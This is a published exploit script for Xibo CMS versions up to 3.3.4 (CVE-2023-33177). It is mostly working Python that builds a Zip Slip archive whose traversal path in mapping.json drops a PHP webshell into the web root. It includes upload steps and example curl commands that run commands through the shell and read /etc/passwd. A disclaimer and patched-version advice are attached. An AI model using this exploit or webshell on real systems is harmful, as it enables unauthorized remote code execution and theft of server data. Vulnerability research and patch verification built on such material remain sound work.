📄 XiboCMS 3.3.4 Traversal / Code Execution

# Exploit Title: XiboCMS 3.3.4-  Remote Code Execution
    # Google Dork: N/A
    # Date: 2025-11-18
    # Exploit Author: complexusprada
    # Vendor Homepage: https://xibo.org.uk/
    # Software Link: https://github.com/xibosignage/xibo-cms
    # Version: 1.8.0 - 2.3.16, 3.0.0 - 3.3.4
    # Tested on: Ubuntu Linux (Docker), Xibo CMS 3.3.4
    # CVE: CVE-2023-33177
    # GHSA: GHSA-jj27-x85q-crqv
    # Category: webapps
    
    """
    # Vulnerability Description:
    # Xibo CMS contains a path traversal vulnerability (Zip Slip) in the layout import
    # functionality. The application fails to properly validate file paths in the mapping.json
    # file within uploaded ZIP archives, allowing authenticated attackers to write files
    # outside the intended library directory using path traversal sequences (../../).
    # This results in arbitrary file upload and remote code execution.
    
    # Exploitation Details:
    # 1. Attacker creates a malicious ZIP file containing a valid Xibo layout structure
    # 2. The mapping.json file contains a path traversal payload (../../web/shell.php)
    # 3. A PHP webshell is placed at the corresponding path within the ZIP structure
    # 4. When the layout is imported, Xibo extracts files without proper path validation
    # 5. The webshell is written to the web root (/var/www/cms/web/shell.php)
    # 6. Attacker gains remote code execution via the webshell
    
    # Vulnerability Chain:
    # ZIP contains:  library/../../web/shell.php
    # Mapping.json:  {"file": "../../web/shell.php", ...}
    # Xibo reads:    library/ + ../../web/shell.php
    # Xibo writes:   /var/www/cms/library/temp/ + ../../web/shell.php
    # Result:        /var/www/cms/web/shell.php (webshell in web root!)
    
    # Prerequisites:
    # - Valid Xibo CMS credentials (any authenticated user with layout import permission)
    # - Xibo CMS versions 1.8.0 - 2.3.16 or 3.0.0 - 3.3.4
    
    # Exploitation Steps:
    # 1. Run this script to generate exploit.zip
    # 2. Log in to Xibo CMS
    # 3. Navigate to: Design → Layouts → Import
    # 4. Upload the generated exploit.zip file
    # 5. Even if JSON errors occur, the webshell has been written to disk
    # 6. Access webshell at: http://<target>/shell.php?cmd=<command>
    # Example: curl 'http://target/shell.php?cmd=id'
    
    # Mitigation:
    # Upgrade to patched versions:
    # - Xibo CMS 2.3.17+ (for 2.x branch)
    # - Xibo CMS 3.3.5+ (for 3.x branch)
    
    # Disclaimer:
    # This exploit is provided for educational purposes, authorized penetration testing,
    # and vulnerability research only. Only use against systems you own or have explicit
    # written permission to test.
    """
    
    import zipfile
    import json
    import sys
    
    def create_exploit():
        """Generate the malicious ZIP file for Xibo CMS RCE exploit"""
    
        print("[*] Xibo CMS Zip Slip RCE Exploit Generator")
        print("[*] CVE-2023-33177 - Path Traversal via Layout Import")
        print("[*] Affected: Xibo CMS 1.8.0-2.3.16, 3.0.0-3.3.4\n")
    
        # Valid Xibo 3.0 layout structure
        # This ensures the ZIP passes initial validation checks
        layout_json = {
            "layout": "Exploit Layout",
            "description": "Path Traversal Test",
            "layoutDefinitions": {
                "schemaVersion": 3,
                "width": 1920,
                "height": 1080,
                "backgroundColor": "#000000",
                "backgroundzIndex": 0,
                "code": "CVE-2023-33177",
                "actions": [],
                "regions": [],
                "drawers": []
            }
        }
    
        # Empty playlist - triggers JSON import code path
        playlist_json = {}
    
        # VULNERABILITY: Path traversal in mapping.json
        # The 'file' field is not properly sanitized before file extraction
        # Xibo constructs the extraction path as: library/temp/ + file['file']
        # Using ../../ allows escaping the library directory
        mapping_json = [{
            "file": "../../web/shell.php",  # Path traversal payload
            "name": "shell.php",
            "type": "module"
        }]
    
        # Simple PHP webshell for command execution
        # Accepts commands via GET parameter: ?cmd=<command>
        webshell = b'<?php system($_GET["cmd"]); ?>'
    
        # Create the malicious ZIP file
        try:
            with zipfile.ZipFile('exploit.zip', 'w', zipfile.ZIP_DEFLATED) as zf:
                # Add required Xibo layout files
                zf.writestr('layout.json', json.dumps(layout_json, indent=2))
                zf.writestr('playlist.json', json.dumps(playlist_json))
                zf.writestr('mapping.json', json.dumps(mapping_json))
    
                # CRITICAL: The file path in the ZIP must match what Xibo expects
                # Xibo calls: $zip->getStream('library/' . $file['file'])
                # Therefore we place the file at: library/../../web/shell.php
                zf.writestr('library/../../web/shell.php', webshell)
    
            print("[+] Exploit ZIP created successfully: exploit.zip")
            print("\n[*] Exploitation Steps:")
            print("    1. Log in to Xibo CMS with valid credentials")
            print("    2. Navigate to: Design → Layouts → Import")
            print("    3. Upload exploit.zip")
            print("    4. Ignore any JSON errors (file is already written)")
            print("    5. Access webshell: http://<target>/shell.php?cmd=<command>")
            print("\n[*] Example:")
            print("    curl 'http://target/shell.php?cmd=id'")
            print("    curl 'http://target/shell.php?cmd=cat%20/etc/passwd'")
            print()
    
        except Exception as e:
            print(f"[-] Error creating exploit: {e}", file=sys.stderr)
            sys.exit(1)
    
    if __name__ == "__main__":
        create_exploit()